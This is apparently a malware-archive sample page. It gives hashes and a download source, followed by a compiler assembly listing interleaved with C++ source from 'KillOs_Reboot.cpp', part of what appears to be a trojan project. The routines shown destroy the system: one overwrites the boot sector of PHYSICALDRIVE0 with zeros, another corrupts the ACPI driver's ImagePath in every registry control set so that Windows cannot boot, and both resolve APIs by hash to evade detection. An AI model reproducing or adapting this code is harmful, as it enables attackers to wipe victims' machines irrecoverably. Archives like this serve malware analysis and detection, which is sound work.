Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 7b676302196a60a472a2560078d3a217 --

Hashes
MD5: 7b676302196a60a472a2560078d3a217
SHA1: 6aeb2d3d958c8ff2f4fc0ccd9799b497e1a312a8
SHA256: 8ac733f7731fb22fcd849ebf34cb080af37ea0033f74d9cdd570395b6937612c
SSDEEP: 384:tF/DXCWl9/UQPCDSIxCpOrkiXBqQ+iKLedbEpHelDzCBwH2zuyM4+/scECfqAI0r:6opHuESNLynXX8LFc7FX2cO+DmPltF
Details
File Type: BSD
Yara Hits
CuckooSandbox/embedded_win_api | YRP/domain | YRP/contentis_base64 |
Source
http://103.68.190.250/Sources//Advance/BJWJ/Builds/BOT_PLUG/Objs/Release/KillOs_Reboot.cod
Strings
		; Listing generated by Microsoft (R) Optimizing Compiler Version 15.00.30729.01 
	TITLE	e:\Projects\progs\Petrosjan\BJWJ\Source\Misc\KillOs_Reboot.cpp
	.686P
	include listing.inc
	.model	flat
INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES
PUBLIC	?Hibernation@TVideoRecDLL@@2HB			; TVideoRecDLL::Hibernation
PUBLIC	?RunCallback@TVideoRecDLL@@2HB			; TVideoRecDLL::RunCallback
;	COMDAT ?RunCallback@TVideoRecDLL@@2HB
CONST	SEGMENT
?RunCallback@TVideoRecDLL@@2HB DD 01000H		; TVideoRecDLL::RunCallback
CONST	ENDS
;	COMDAT ?Hibernation@TVideoRecDLL@@2HB
CONST	SEGMENT
?Hibernation@TVideoRecDLL@@2HB DD 01H			; TVideoRecDLL::Hibernation
CONST	ENDS
PUBLIC	??$pushargEx@$00$0IPIPBBE@$0BE@PBDKHHHHH@@YAPAXPBDKHHHHH@Z ; pushargEx<1,150532372,20,char const *,unsigned long,int,int,int,int,int>
EXTRN	?GetProcAddressEx2@@YAPAXPADKKH@Z:PROC		; GetProcAddressEx2
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\core\getapi.h
;	COMDAT ??$pushargEx@$00$0IPIPBBE@$0BE@PBDKHHHHH@@YAPAXPBDKHHHHH@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
_a6$ = 28						; size = 4
_a7$ = 32						; size = 4
??$pushargEx@$00$0IPIPBBE@$0BE@PBDKHHHHH@@YAPAXPBDKHHHHH@Z PROC ; pushargEx<1,150532372,20,char const *,unsigned long,int,int,int,int,int>, COMDAT
; 147  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 148  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E, F, G);
; 149  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	6a 14		 push	 20			; 00000014H
  00005	68 14 f1 f8 08	 push	 150532372		; 08f8f114H
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 150  : 	return func(a1, a2, a3, a4, a5, a6, a7);
  00016	ff 75 20	 push	 DWORD PTR _a7$[ebp]
  00019	ff 75 1c	 push	 DWORD PTR _a6$[ebp]
  0001c	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001f	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  00022	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00025	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00028	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  0002b	ff d0		 call	 eax
; 151  : }
  0002d	5d		 pop	 ebp
  0002e	c3		 ret	 0
??$pushargEx@$00$0IPIPBBE@$0BE@PBDKHHHHH@@YAPAXPBDKHHHHH@Z ENDP ; pushargEx<1,150532372,20,char const *,unsigned long,int,int,int,int,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z PROC ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	6a 16		 push	 22			; 00000016H
  00005	68 c3 d1 3f 0f	 push	 255840707		; 0f3fd1c3H
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
  00016	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  00019	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001c	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  0001f	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00022	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00025	ff d0		 call	 eax
; 135  : }
  00027	5d		 pop	 ebp
  00028	c3		 ret	 0
??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ENDP ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z	; pushargEx<1,1916711125,17,void *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z PROC	; pushargEx<1,1916711125,17,void *>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	6a 11		 push	 17			; 00000011H
  00002	68 d5 b0 3e 72	 push	 1916711125		; 723eb0d5H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00013	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  00017	ff d0		 call	 eax
; 103  : }
  00019	c3		 ret	 0
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z ENDP	; pushargEx<1,1916711125,17,void *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z ; pushargEx<2,2866184184,206,HKEY__ *,char *,int,long,HKEY__ * *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z PROC ; pushargEx<2,2866184184,206,HKEY__ *,char *,int,long,HKEY__ * *>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	68 ce 00 00 00	 push	 206			; 000000ceH
  00008	68 f8 7f d6 aa	 push	 -1428783112		; aad67ff8H
  0000d	6a 02		 push	 2
  0000f	6a 00		 push	 0
  00011	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00016	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
  00019	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001c	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001f	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00022	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00025	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00028	ff d0		 call	 eax
; 135  : }
  0002a	5d		 pop	 ebp
  0002b	c3		 ret	 0
??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z ENDP ; pushargEx<2,2866184184,206,HKEY__ *,char *,int,long,HKEY__ * *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z ; pushargEx<2,1044385750,219,HKEY__ *,char const *,int,int,unsigned char const *,unsigned long>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
_a6$ = 28						; size = 4
??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z PROC ; pushargEx<2,1044385750,219,HKEY__ *,char const *,int,int,unsigned char const *,unsigned long>, COMDAT
; 139  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 140  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E, F);
; 141  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	68 db 00 00 00	 push	 219			; 000000dbH
  00008	68 d6 0f 40 3e	 push	 1044385750		; 3e400fd6H
  0000d	6a 02		 push	 2
  0000f	6a 00		 push	 0
  00011	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00016	83 c4 10	 add	 esp, 16			; 00000010H
; 142  : 	return func(a1, a2, a3, a4, a5, a6);
  00019	ff 75 1c	 push	 DWORD PTR _a6$[ebp]
  0001c	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  0001f	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  00022	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  00025	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00028	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  0002b	ff d0		 call	 eax
; 143  : }
  0002d	5d		 pop	 ebp
  0002e	c3		 ret	 0
??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z ENDP ; pushargEx<2,1044385750,219,HKEY__ *,char const *,int,int,unsigned char const *,unsigned long>
_TEXT	ENDS
PUBLIC	??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z ; pushargEx<2,3677705524,216,HKEY__ *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z PROC ; pushargEx<2,3677705524,216,HKEY__ *>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	68 d8 00 00 00	 push	 216			; 000000d8H
  00005	68 34 55 35 db	 push	 -617261772		; db355534H
  0000a	6a 02		 push	 2
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00016	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  0001a	ff d0		 call	 eax
; 103  : }
  0001c	c3		 ret	 0
??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z ENDP ; pushargEx<2,3677705524,216,HKEY__ *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z ; pushargEx<5,3265704366,414,long,int,int,unsigned char *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z PROC ; pushargEx<5,3265704366,414,long,int,int,unsigned char *>, COMDAT
; 124  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D);
; 125  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	68 9e 01 00 00	 push	 414			; 0000019eH
  00005	68 ae b1 a6 c2	 push	 -1029262930		; c2a6b1aeH
  0000a	6a 05		 push	 5
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 126  : 	return func(a1,a2,a3,a4);
  00016	ff 74 24 10	 push	 DWORD PTR _a4$[esp-4]
  0001a	ff 74 24 10	 push	 DWORD PTR _a3$[esp]
  0001e	ff 74 24 10	 push	 DWORD PTR _a2$[esp+4]
  00022	ff 74 24 10	 push	 DWORD PTR _a1$[esp+8]
  00026	ff d0		 call	 eax
; 127  : }
  00028	c3		 ret	 0
??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z ENDP ; pushargEx<5,3265704366,414,long,int,int,unsigned char *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z	; pushargEx<3,2909815716,266,int,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z PROC	; pushargEx<3,2909815716,266,int,int>, COMDAT
; 108  : 	typedef LPVOID (WINAPI *newfunc)(A, B);
; 109  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	68 0a 01 00 00	 push	 266			; 0000010aH
  00005	68 a4 43 70 ad	 push	 -1385151580		; ad7043a4H
  0000a	6a 03		 push	 3
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 110  : 	return func(a1,a2);
  00016	ff 74 24 08	 push	 DWORD PTR _a2$[esp-4]
  0001a	ff 74 24 08	 push	 DWORD PTR _a1$[esp]
  0001e	ff d0		 call	 eax
; 111  : }
  00020	c3		 ret	 0
??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z ENDP	; pushargEx<3,2909815716,266,int,int>
_TEXT	ENDS
PUBLIC	??_C@_0BD@KGBPHNNA@?2?2?4?2PHYSICALDRIVE0?$AA@	; `string'
EXTRN	?m_memset@@YAXPBXEI@Z:PROC			; m_memset
;	COMDAT ??_C@_0BD@KGBPHNNA@?2?2?4?2PHYSICALDRIVE0?$AA@
CONST	SEGMENT
??_C@_0BD@KGBPHNNA@?2?2?4?2PHYSICALDRIVE0?$AA@ DB '\\.\PHYSICALDRIVE0', 00H ; `string'
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\misc\killos_reboot.cpp
CONST	ENDS
;	COMDAT ?KillOs1@@YA_NXZ
_TEXT	SEGMENT
_p$ = -516						; size = 512
_size$ = -4						; size = 4
?KillOs1@@YA_NXZ PROC					; KillOs1, COMDAT
; 18   : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 04 02 00
	00		 sub	 esp, 516		; 00000204H
  00009	53		 push	 ebx
  0000a	57		 push	 edi
; 19   : 	// 
; 20   : 	HANDLE hDest;
; 21   : 	CHAR p[512];
; 22   : 	DWORD size;
; 23   : 	BOOL ret;
; 24   :  
; 25   : 	hDest = pCreateFileA("\\\\.\\PHYSICALDRIVE0",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
  0000b	6a 14		 push	 20			; 00000014H
  0000d	68 14 f1 f8 08	 push	 150532372		; 08f8f114H
  00012	6a 01		 push	 1
  00014	33 ff		 xor	 edi, edi
  00016	57		 push	 edi
  00017	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  0001c	83 c4 10	 add	 esp, 16			; 00000010H
  0001f	57		 push	 edi
  00020	68 80 00 00 00	 push	 128			; 00000080H
  00025	6a 03		 push	 3
  00027	57		 push	 edi
  00028	6a 01		 push	 1
  0002a	68 00 00 00 c0	 push	 -1073741824		; c0000000H
  0002f	68 00 00 00 00	 push	 OFFSET ??_C@_0BD@KGBPHNNA@?2?2?4?2PHYSICALDRIVE0?$AA@
  00034	ff d0		 call	 eax
  00036	8b d8		 mov	 ebx, eax
; 26   : 	if(hDest == INVALID_HANDLE_VALUE)
  00038	83 fb ff	 cmp	 ebx, -1
  0003b	75 04		 jne	 SHORT $LN1@KillOs1
; 27   : 	{
; 28   : 		return FALSE;
  0003d	32 c0		 xor	 al, al
  0003f	eb 3d		 jmp	 SHORT $LN2@KillOs1
$LN1@KillOs1:
  00041	56		 push	 esi
; 29   : 	};
; 30   :     
; 31   :       
; 32   :     m_memset(p, 0, sizeof(p));
  00042	be 00 02 00 00	 mov	 esi, 512		; 00000200H
  00047	56		 push	 esi
  00048	8d 85 fc fd ff
	ff		 lea	 eax, DWORD PTR _p$[ebp]
  0004e	57		 push	 edi
  0004f	50		 push	 eax
  00050	e8 00 00 00 00	 call	 ?m_memset@@YAXPBXEI@Z	; m_memset
; 33   : 	size = sizeof(p);
; 34   : 	ret = (BOOL) pWriteFile(hDest,p,size,&size,NULL);
  00055	57		 push	 edi
  00056	8d 45 fc	 lea	 eax, DWORD PTR _size$[ebp]
  00059	50		 push	 eax
  0005a	56		 push	 esi
  0005b	8d 85 fc fd ff
	ff		 lea	 eax, DWORD PTR _p$[ebp]
  00061	50		 push	 eax
  00062	53		 push	 ebx
  00063	89 75 fc	 mov	 DWORD PTR _size$[ebp], esi
  00066	e8 00 00 00 00	 call	 ??$pushargEx@$00$0PDPNBMD@$0BG@PAXPADKPAKH@@YAPAXPAXPADKPAKH@Z ; pushargEx<1,255840707,22,void *,char *,unsigned long,unsigned long *,int>
; 35   :         
; 36   :     pCloseHandle(hDest);
  0006b	53		 push	 ebx
  0006c	8b f0		 mov	 esi, eax
  0006e	e8 00 00 00 00	 call	 ??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z ; pushargEx<1,1916711125,17,void *>
  00073	83 c4 24	 add	 esp, 36			; 00000024H
; 37   : 	
; 38   : 	return ret != FALSE;
  00076	33 c0		 xor	 eax, eax
  00078	3b f7		 cmp	 esi, edi
  0007a	0f 95 c0	 setne	 al
  0007d	5e		 pop	 esi
$LN2@KillOs1:
  0007e	5f		 pop	 edi
  0007f	5b		 pop	 ebx
; 39   : }
  00080	c9		 leave
  00081	c3		 ret	 0
?KillOs1@@YA_NXZ ENDP					; KillOs1
_TEXT	ENDS
PUBLIC	??_C@_09JMMKOPDJ@ImagePath?$AA@			; `string'
PUBLIC	??_C@_0P@GPJKKLCO@?2services?2ACPI?$AA@		; `string'
PUBLIC	??_C@_07HCDGMPEB@SYSTEM?2?$AA@			; `string'
PUBLIC	??_C@_0BK@PHPGFLJ@system32?2drivers?2A?QPI?4sys?$AA@ ; `string'
PUBLIC	??_C@_0BC@KEFDNJNC@CurrentControlSet?$AA@	; `string'
PUBLIC	??_C@_0O@DMMDAJLG@ControlSet002?$AA@		; `string'
PUBLIC	??_C@_0O@BHOOFKHF@ControlSet001?$AA@		; `string'
EXTRN	?m_lstrlen@@YGKPBD@Z:PROC			; m_lstrlen
EXTRN	?m_lstrcat@@YGXPADPBD@Z:PROC			; m_lstrcat
EXTRN	?m_lstrcpy@@YGXPADPBD@Z:PROC			; m_lstrcpy
;	COMDAT ??_C@_09JMMKOPDJ@ImagePath?$AA@
CONST	SEGMENT
??_C@_09JMMKOPDJ@ImagePath?$AA@ DB 'ImagePath', 00H	; `string'
CONST	ENDS
;	COMDAT ??_C@_0P@GPJKKLCO@?2services?2ACPI?$AA@
CONST	SEGMENT
??_C@_0P@GPJKKLCO@?2services?2ACPI?$AA@ DB '\services\ACPI', 00H ; `string'
CONST	ENDS
;	COMDAT ??_C@_07HCDGMPEB@SYSTEM?2?$AA@
CONST	SEGMENT
??_C@_07HCDGMPEB@SYSTEM?2?$AA@ DB 'SYSTEM\', 00H	; `string'
CONST	ENDS
;	COMDAT ??_C@_0BK@PHPGFLJ@system32?2drivers?2A?QPI?4sys?$AA@
CONST	SEGMENT
??_C@_0BK@PHPGFLJ@system32?2drivers?2A?QPI?4sys?$AA@ DB 'system32\drivers'
	DB	'\A', 0d1H, 'PI.sys', 00H			; `string'
CONST	ENDS
;	COMDAT ??_C@_0BC@KEFDNJNC@CurrentControlSet?$AA@
CONST	SEGMENT
??_C@_0BC@KEFDNJNC@CurrentControlSet?$AA@ DB 'CurrentControlSet', 00H ; `string'
CONST	ENDS
;	COMDAT ??_C@_0O@DMMDAJLG@ControlSet002?$AA@
CONST	SEGMENT
??_C@_0O@DMMDAJLG@ControlSet002?$AA@ DB 'ControlSet002', 00H ; `string'
CONST	ENDS
;	COMDAT ??_C@_0O@BHOOFKHF@ControlSet001?$AA@
CONST	SEGMENT
??_C@_0O@BHOOFKHF@ControlSet001?$AA@ DB 'ControlSet001', 00H ; `string'
; Function compile flags: /Ogspy
CONST	ENDS
;	COMDAT ?KillOs2@@YA_NXZ
_TEXT	SEGMENT
_path$73902 = -284					; size = 260
_items$ = -24						; size = 16
_key$73905 = -8						; size = 4
_ret$ = -1						; size = 1
?KillOs2@@YA_NXZ PROC					; KillOs2, COMDAT
; 43   : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	81 ec 1c 01 00
	00		 sub	 esp, 284		; 0000011cH
  00009	53		 push	 ebx
  0000a	56		 push	 esi
; 44   : 	bool ret = false;
; 45   : 	const char* items[] = { "ControlSet001", "ControlSet002", "CurrentControlSet", 0 };
  0000b	b8 00 00 00 00	 mov	 eax, OFFSET ??_C@_0O@BHOOFKHF@ControlSet001?$AA@
  00010	33 db		 xor	 ebx, ebx
  00012	57		 push	 edi
  00013	c6 45 ff 00	 mov	 BYTE PTR _ret$[ebp], 0
  00017	89 45 e8	 mov	 DWORD PTR _items$[ebp], eax
  0001a	c7 45 ec 00 00
	00 00		 mov	 DWORD PTR _items$[ebp+4], OFFSET ??_C@_0O@DMMDAJLG@ControlSet002?$AA@
  00021	c7 45 f0 00 00
	00 00		 mov	 DWORD PTR _items$[ebp+8], OFFSET ??_C@_0BC@KEFDNJNC@CurrentControlSet?$AA@
  00028	89 5d f4	 mov	 DWORD PTR _items$[ebp+12], ebx
  0002b	8b f0		 mov	 esi, eax
; 46   : 	int i = 0;
  0002d	bf 00 00 00 00	 mov	 edi, OFFSET ??_C@_0BK@PHPGFLJ@system32?2drivers?2A?QPI?4sys?$AA@
$LL6@KillOs2:
; 47   : 	while( items[i] )
; 48   : 	{
; 49   : 	    char path[MAX_PATH];
; 50   : 		m_lstrcpy( path, "SYSTEM\\" );
  00032	68 00 00 00 00	 push	 OFFSET ??_C@_07HCDGMPEB@SYSTEM?2?$AA@
  00037	8d 85 e4 fe ff
	ff		 lea	 eax, DWORD PTR _path$73902[ebp]
  0003d	50		 push	 eax
  0003e	e8 00 00 00 00	 call	 ?m_lstrcpy@@YGXPADPBD@Z	; m_lstrcpy
; 51   : 		m_lstrcat( path, items[i] );
  00043	56		 push	 esi
  00044	8d 85 e4 fe ff
	ff		 lea	 eax, DWORD PTR _path$73902[ebp]
  0004a	50		 push	 eax
  0004b	e8 00 00 00 00	 call	 ?m_lstrcat@@YGXPADPBD@Z	; m_lstrcat
; 52   : 		m_lstrcat( path, "\\services\\ACPI" );
  00050	68 00 00 00 00	 push	 OFFSET ??_C@_0P@GPJKKLCO@?2services?2ACPI?$AA@
  00055	8d 85 e4 fe ff
	ff		 lea	 eax, DWORD PTR _path$73902[ebp]
  0005b	50		 push	 eax
  0005c	e8 00 00 00 00	 call	 ?m_lstrcat@@YGXPADPBD@Z	; m_lstrcat
; 53   : 		HKEY key;
; 54   : 	    LONG res = (LONG)pRegOpenKeyExA( HKEY_LOCAL_MACHINE, path, 0, KEY_ALL_ACCESS, &key );
  00061	8d 45 f8	 lea	 eax, DWORD PTR _key$73905[ebp]
  00064	50		 push	 eax
  00065	68 3f 00 0f 00	 push	 983103			; 000f003fH
  0006a	6a 00		 push	 0
  0006c	8d 85 e4 fe ff
	ff		 lea	 eax, DWORD PTR _path$73902[ebp]
  00072	50		 push	 eax
  00073	68 02 00 00 80	 push	 -2147483646		; 80000002H
  00078	e8 00 00 00 00	 call	 ??$pushargEx@$01$0KKNGHPPI@$0MO@PAUHKEY__@@PADHJPAPAU1@@@YAPAXPAUHKEY__@@PADHJPAPAU0@@Z ; pushargEx<2,2866184184,206,HKEY__ *,char *,int,long,HKEY__ * *>
  0007d	83 c4 14	 add	 esp, 20			; 00000014H
; 55   : 	    if( res == ERROR_SUCCESS )
  00080	85 c0		 test	 eax, eax
  00082	75 2e		 jne	 SHORT $LN4@KillOs2
; 56   : 		{
; 57   : 			//
PI.sys 
; 58   : 			const char* CORRUPTED_PATH = "system32\\drivers\\A
PI.sys";
; 59   : 			res = (LONG)pRegSetValueExA( key, "ImagePath", 0, REG_SZ, (const BYTE *)CORRUPTED_PATH, m_lstrlen(CORRUPTED_PATH) + 1 );
  00084	57		 push	 edi
  00085	e8 00 00 00 00	 call	 ?m_lstrlen@@YGKPBD@Z	; m_lstrlen
  0008a	40		 inc	 eax
  0008b	50		 push	 eax
  0008c	57		 push	 edi
  0008d	6a 01		 push	 1
  0008f	6a 00		 push	 0
  00091	68 00 00 00 00	 push	 OFFSET ??_C@_09JMMKOPDJ@ImagePath?$AA@
  00096	ff 75 f8	 push	 DWORD PTR _key$73905[ebp]
  00099	e8 00 00 00 00	 call	 ??$pushargEx@$01$0DOEAAPNG@$0NL@PAUHKEY__@@PBDHHPBEK@@YAPAXPAUHKEY__@@PBDHHPBEK@Z ; pushargEx<2,1044385750,219,HKEY__ *,char const *,int,int,unsigned char const *,unsigned long>
  0009e	83 c4 18	 add	 esp, 24			; 00000018H
; 60   : 	        if( res == ERROR_SUCCESS )
  000a1	85 c0		 test	 eax, eax
  000a3	75 04		 jne	 SHORT $LN3@KillOs2
; 61   : 	        {
; 62   : 				DBG( "KillOs2: Success: %s = %s", path, CORRUPTED_PATH );
; 63   : 				ret = true;
  000a5	c6 45 ff 01	 mov	 BYTE PTR _ret$[ebp], 1
$LN3@KillOs2:
; 64   : 			}        
; 65   : 			else
; 66   : 			{
; 67   : 				DBG( "KillOs2: Error: %s = %s", path, CORRUPTED_PATH );
; 68   : 			}
; 69   : 	        //pRegFlushKey(key);
; 70   : 			pRegCloseKey(key);
  000a9	ff 75 f8	 push	 DWORD PTR _key$73905[ebp]
  000ac	e8 00 00 00 00	 call	 ??$pushargEx@$01$0NLDFFFDE@$0NI@PAUHKEY__@@@@YAPAXPAUHKEY__@@@Z ; pushargEx<2,3677705524,216,HKEY__ *>
  000b1	59		 pop	 ecx
$LN4@KillOs2:
  000b2	8b 74 9d ec	 mov	 esi, DWORD PTR _items$[ebp+ebx*4+4]
; 71   : 		}
; 72   : 		else
; 73   : 		{
; 74   : 			DBG( "KillOs2: RegOpenKey() ERROR %d\n", res );
; 75   : 		}
; 76   : 		i++;
  000b6	43		 inc	 ebx
  000b7	85 f6		 test	 esi, esi
  000b9	0f 85 73 ff ff
	ff		 jne	 $LL6@KillOs2
; 77   : 	}
; 78   : 	return ret;
  000bf	8a 45 ff	 mov	 al, BYTE PTR _ret$[ebp]
